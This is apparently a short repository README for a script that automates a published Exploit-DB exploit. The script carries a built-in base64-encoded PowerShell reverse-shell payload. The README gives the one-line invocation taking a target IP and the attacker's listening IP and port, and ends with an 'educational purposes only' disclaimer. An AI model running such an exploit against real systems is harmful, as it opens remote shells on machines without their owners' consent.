All Credit goes to author of original exploit, Payal: https://www.exploit-db.com/exploits/51072. I automated the exploit with built-in powershell3 base64 encoded payload that can be found here: https://www.revshells.com/ ,so there is no more need to create payload locally and then transfer it.
python3 exploit.py <TARGET_IP> <LOCAL_IP> <LOCAL_PORT>
PoC-Final.mov
All content provided in this repository is intended for educational purposes only and should not be used for malicious activities or abuse. Users assume full responsibility and risk when accessing or utilizing the materials provided.